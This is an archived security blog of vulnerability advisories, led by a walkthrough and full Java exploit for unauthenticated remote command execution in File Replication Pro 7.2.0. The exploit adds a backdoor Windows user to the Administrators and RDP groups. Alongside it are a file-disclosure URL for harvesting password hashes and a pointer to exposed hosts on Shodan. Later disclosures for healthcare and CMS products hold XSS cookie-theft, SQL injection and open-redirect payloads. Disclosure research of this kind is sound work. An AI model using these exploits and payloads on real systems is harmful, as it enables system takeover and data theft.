Category Archives: advisory

Exploiting File Replication Pro 7.2.0

* The information found in this post is for educational purposes only and not to be used for illegal purposes *

Recently, a security advisory on the vulnerabilities found in File Replication Pro 7.2.0 was released on this site. This post shows the steps involved to remotely gain access to the system that has this software installed. As of the date of this post, the trial version of FRP 7.2.0 is still available for download at http://www.filereplicationpro.com.

* Note: A quick search on shodan.io with the keywords “FRP Node Ready” shows quite a number of vulnerable systems out there. *

That aside, the first step will be to install the software. We will be using a Windows 7 machine for this demonstration. After running the installer , there will be a few services added to startup, namely 3 ‘prunsrv.exe’ processes as shown below. Note that the services are running under the privileges of the NT AUTHORITY\SYSTEM account:

frp1

The unauthenticated remote command execution vulnerability will be exploiting the way these processes handle password authentication to achieve command execution as the NT AUTHORITY\SYSTEM user. Using a browser, navigate to the localhost’s port 9200, which runs the replication RPC service. You should see the following:

frp2

The “OK” at the end of the “>> FRP Node Ready>> C24EB17AEF0D61>> OK” output indicates that the current RPC server does not require any form of authentication. This is the default behavior in a vanilla install. However, if you see an “ERROR” instead of an “OK”, it means that the RPC server is configured with a password and authentication is required. There is however another vulnerability that exists in the software that allows unauthenticated remote file access which can be abused to retrieve the password hash. FRP password hashes and configurations can be access remotely and unauthenticated using the following link:

http://127.0.0.1:9100/DetailedLogReader.jsp?log_path=C:\Program+Files\FileReplicationPro\\etc\\configuration.xml

You should see the password hash in the configuration.xml file. If more clients have been added to the FRP management server, you will also be able to see all the other password hashes there. If you explore further and take a look into the .jar and .war files that can be found in the installation directory and figure how the software works, you can then proceed to create a malicious RPC client, that in this example, adds an arbitrary user to the remote system, and then adds this user to both the Administrator and RDP groups.

The following exploit code is used in this example. Remember to replace the IP, port, and password variables accordingly:

/**
 * @author Jerold Hoong (Vantage Point Security)
 * File Replication Pro =< v7.2.0
 * Remote Command Execution PoC Working Exploit
 * www.vantagepoint.sg
 * NOTE: Include FRP libraries to compile
 */

import java.io.IOException;
import java.util.HashMap;
import java.util.Map;
import net.diasoft.frp.engine.exception.RPCException;
import net.diasoft.frp.engine.model.AddressPort;
import net.diasoft.frp.engine.tcp.client.RPCDriver;
import net.diasoft.frp.engine.tcp.client.TCPConnection;

public class Main {

    static String ip = "1.2.3.4";
    static int port = 9200;
    // password string can be retrieved from remote file disclosure vulnerability (configuration.xml)
    // If no password is set, input blank string for password
    // Use IE to navigate to :9200. OK = NO-AUTH, Error = AUTH

    static String password = ""; // password 12345 jLIjfQZ5yojbZGTqxg2pY0VROWQ=

    public static void main(String[] args) {

        AddressPort ap = new AddressPort(ip, port);
        AddressPort addresses[] = {ap};
        TCPConnection _tcp_connection = null;

        try {
            _tcp_connection = new TCPConnection(addresses, password, true);

        } catch (Exception e) {
            e.printStackTrace();
        }

        System.out.print("Connecting to host...");
        RPCDriver rpc = new RPCDriver(_tcp_connection);
        HashMap p = new HashMap();

        try {
            Map r = rpc.callFunction("ExecCommand", p);
            System.out.print("Success!\n");
        } catch (RPCException e) {
            e.printStackTrace();
        } catch (IOException e) {
            e.printStackTrace();
        } catch (ClassNotFoundException e) {

            e.printStackTrace();
        }

        // add new user
        System.out.print("Attempting to add user 'vantagepoint' with password 'LOLrofl1337!': ");
        p.put("COMMAND", "net user vantagepoint LOLrofl1337! /add");
        try {
            Map r = rpc.callFunction("ExecCommand", p);
        } catch (RPCException e) {
            e.printStackTrace();
        } catch (IOException e) {
            e.printStackTrace();
        } catch (ClassNotFoundException e) {

            e.printStackTrace();
        }

        // add new user to Admin group
        System.out.print("Attempting to add user 'vantagepoint' to 'Administrators' group: ");
        p.put("COMMAND", "net localgroup \"Administrators\" vantagepoint /add");
        try {
            Map r = rpc.callFunction("ExecCommand", p);
        } catch (RPCException e) {
            e.printStackTrace();
        } catch (IOException e) {
            e.printStackTrace();
        } catch (ClassNotFoundException e) {

            e.printStackTrace();
        }

        //add new user to RDP group
        System.out.print("Attempting to add user 'vantagepoint' to 'Remote Desktop Users' group:");
        p.put("COMMAND", "net localgroup \"Remote Desktop Users\" vantagepoint /add");
        try {
            Map r = rpc.callFunction("ExecCommand", p);
        } catch (RPCException e) {
            e.printStackTrace();
        } catch (IOException e) {
            e.printStackTrace();
        } catch (ClassNotFoundException e) {

            e.printStackTrace();
        }
        System.out.print("\n\n---- END ----\n\n");

    }
}

The following screenshot shows the list of users on the Windows 7 system, before the exploit code was executed:

frp3

After the exploit code was successfully executed:

Screen Shot 2016-02-15 at 11.40.51 PM

frp4

frp5

If RDP was not activated on the remote host, you can always tweak the commands in the exploit to activate it. You should now be able to RDP to the box and access the box as an Administrator.

Here is a video showing the exploit in action:

Update: After a long time, the guys at FRP finally released the fixed version: https://frpsupport.fogbugz.com/default.asp?W291

frp2016-730-released

eClinicalWorks (CCMR) – Multiple Vulnerabilities

# Title: eClinicalWorks (CCMR) - Multiple Vulnerabilities
# Vendor: https://www.eclinicalworks.com
# Product: eClinicalWorks Population Health (CCMR) Client Portal Software 
# URL: https://www.eclinicalworks.com/products-services/population-health-ccmr/
# Credit: Jerold Hoong
-------------------------------------
# CVE-2015-4591 CROSS-SITE SCRIPTING
Cross-site scripting (XSS) vulnerability in login.jsp in eClinicalWorks Population Health (CCMR) Client Portal Software allows remote authenticated users to inject arbitrary javascript via the strMessage parameter.

https://127.0.0.1/mobiledoc/jsp/ccmr/clientPortal/login.jsp?strMessage=%3Cimg%20src=/%20onerror=%22alert%28document.cookie%29%22/%3E
-------------------------------------
# CVE-2015-4592 SQL INJECTION
SQL injection vulnerability in portalUserService.jsp in eClinicalWorks Population Health (CCMR) Client Portal Software allows remote authenticated users to inject arbitrary malicious database commands as part of user input.

Parameter: uemail (POST PARAMETER)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: action=updatePersonalInfo&ufname=john&ulname=doe&upaddress=&upcity=&upstate=
&zipcode=&uemail=john.doe@test.com';WAITFOR DELAY '0:0:5'--&upphone=0&umobileno=

POST /mobiledoc/jsp/ccmr/clientPortal/admin/service/portalUserService.jsp HTTP/1.1
Host: 127.0.0.1:443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: https://127.0.0.1/mobiledoc/jsp/ccmr/clientPortal/dashBoard.jsp
Content-Length: 186
[SNIP] ...
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
[SNIP] ...

action=updatePersonalInfo&ufname=john&ulname=doe&upaddress=&upcity=&upstate=&zipcode=&uemail=john.doe@test.com';WAITFOR DELAY '0:0:5'--&upphone=0&umobileno=
-------------------------------------
# CVE-2015-4593 CROSS-SITE REQUEST FORGERY
Cross-site request forgery (CSRF) vulnerability in portalUserService.jsp in eClinicalWorks  Client Portal allows remote attackers to hijack the authentication of content administrators for requests that could lead to the creation, modification and deletion of users, appointments and employees.
-------------------------------------
# CVE-2015-4594 SESSION FIXATION
The web application is vulnerable to session fixation attacks. When authenticating a user the application does not assign a new session ID, making it possible to use an existent session ID.
-------------------------------------
# TIMELINE
– 16/06/2015: Vulnerability found
– 16/06/2015: Vendor informed
– 16/06/2015: Request for CVE IDs
- 16/06/2015: MITRE issued CVE numbers
– 16/06/2015: Vendor responded requesting more information on support contract etc
- 21/06/2015: No support contract, vendor does not open case
- 22/06/2015: Requested update from vendor, no response
- 01/07/2015: Contacted vendor again, vendor requested for support contract again
- 02/07/2015: No support contract, no response from vendor
– 31/01/2016: Public disclosure

INFINITT PACs – Multiple Vulnerablities

# Title: INFINITT PACs Health Care System - Multiple Vulnerabilities
# Vendor: http://www.infinitt.com/cms/index
# Product: INFINITT PACs Health Care System 
# Credit: Jerold Hoong
-------------------------------------
# CROSS-SITE SCRIPTING
Cross-site scripting (XSS) vulnerability in jerry.asp in INFINITT PACs Health Care System allows remote unauthenticated users to inject arbitrary javascript via the pname parameter.
-------------------------------------
# SQL INJECTION
SQL injection vulnerability in jerry.asp in INFINITT PACs Health Care System allows remote authenticated users to inject arbitrary malicious database commands as part of user input via the uid parameter.
-------------------------------------
# PASSWORDS ENCODED IN PACS DATABASE
The Infinitt PACS system does not implement an encryption scheme when storing user account passwords in the database. Based on our observations, the application does a “substitution” operation for each of the password characters and stores the password directly into the database.
-------------------------------------
# INSECURE PROTOCOL USED
The Infinitt PACS system communicates with the DICOM component using the HTTP protocol. The system uses HTTP basic authentication when retrieving DICOM images from the server, which includes user  credentials encoded in Base64 as part of the HTTP request. This can be easily decoded to obtain the authentication credentials in plaintext.

CSRF and XSS Vulnerabilities in Ektron CMS 9.10 SP1

I found a couple of vulnerabilities in Ektron CMS 9.10 SP1. Below is the published advisory for anyone that is interested.

# Vulnerability type: Cross-site Request Forgery
# Vendor: http://www.ektron.com/
# Product: Ektron Content Management System
# Affected version: =< 9.10 SP1 (Build 9.1.0.184.1.114)
# Patched version: 9.10 SP1 (Build 9.1.0.184.1.120)
# CVE ID: CVE-2015-3624
# Credit: Jerold Hoong

# PROOF OF CONCEPT (CSRF)

Cross-site request forgery (CSRF) vulnerability in MenuActions.aspx in Ektron CMS 9.10 SP1 before build 9.1.0.184.1.120 allows remote attackers to hijack the authentication of content administrators for requests that could lead to the deletion of content and assets.

csrf

# Vulnerability type: Cross-site Scripting
# Vendor: http://www.ektron.com/
# Product: Ektron Content Management System
# Affected version: =< 9.10 SP1 (Build 9.1.0.184.1.102)
# Patched version: 9.10 SP1 (Build 9.1.0.184.1.114)
# CVE ID: CVE-2015-4427
# Credit: Jerold Hoong

# PROOF OF CONCEPT (XSS)

Cross-site scripting (XSS) vulnerability in workarea.aspx in Ektron CMS 9.10 SP1 on build 9.1.0.184.1.102 and earlier allows remote authenticated users to inject arbitrary javascript via the page, action, folder_id and LangType parameter.

GET /Test/WorkArea/workarea.aspx?page=content.aspx%27%3balert
%28%22XSS%22%29%2f%2f&action=ViewContentByCategory&folder_id=0
&LangType=1033 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
... [SNIP] ...
Cookie: EktGUID=014949ec-36ac-4b89-9c0b-8b03ed29b0ed; EkAnalytics=0;
ASP.NET_SessionId=zxucmt5zyugbtwrm4vseakw5;
... [SNIP] ...

# VULNERABLE PARAMETERS:
- page
- action
- folder_id
- LangType

# SAMPLE PAYLOAD
- ';alert("XSS")//

# TIMELINE
– 07/04/2015: Vulnerability found
– 07/04/2015: Vendor informed
– 08/04/2015: Vendor responded and acknowledged
- 01/05/2015: MITRE issued CVE number CVE-2015-3624 (CSRF)
– 28/05/2015: Vendor fixed the issue
– 31/05/2015: Public disclosure

Sample XSS Screenshot:
ektron_xss

IBM Watson SaaS Infrastructure Vulnerability

I recently found a couple of vulnerabilities in the SaaS cloud computing infrastructure of IBM Watson. After reporting the issue on the IBM PSIRT website and working with them to fix the issue, IBM replied with the following:

“Thanks for confirming that the issue has been fixed. Because this is a SaaS offering, we will not be publishing and acknowledging via security bulletin. However please know that we appreciate your cooperation and the effort to inform us of the vulnerability.”

Anyway, I have included the advisory below for anyone who is interested. It is interesting to see that trivial vulnerabilities like these are still in the wild.

# Vulnerability type: Cross-site Scripting & Redirect  
# Vendor: www.ibm.com
# Product: IBM Watson Cloud Computing SaaS (Cognea)
# Product Link: http://www.ibm.com/smarterplanet/us/en/ibmwatson/
# Credit: Jerold Hoong

The logout.jsp page function of the IBM Watson SaaS application is vulnerable 
to reflected XSS and redirect attacks. The value of the Referer HTTP header
is directly referenced by the logout.jsp page and echoes the input unmodified
in to the application’s response.

# PROOF OF CONCEPT (XSS)

- Sample URL: http://127.0.0.1/test/logout.jsp
- Parameter: Referer HTTP header
- Payload: javascript:alert('XSS')//

# PROOF OF CONCEPT (Redirect)

The logout.jsp page is vulnerable to unauthorised redirects.

- Sample URL: http://127.0.0.1/test/logout.jsp
- Parameter: Referer HTTP header
- Payload: http://malicious-site.com/

# TIMELINE
- 16/04/2015: Vulnerability found
- 17/04/2015: Vendor informed
- 18/04/2015: Vendor responded and acknowledged
- 03/06/2015: Vendor fixed the issue
- 04/06/2015: Public disclosure

Sample XSS screenshot:
IBM-Watson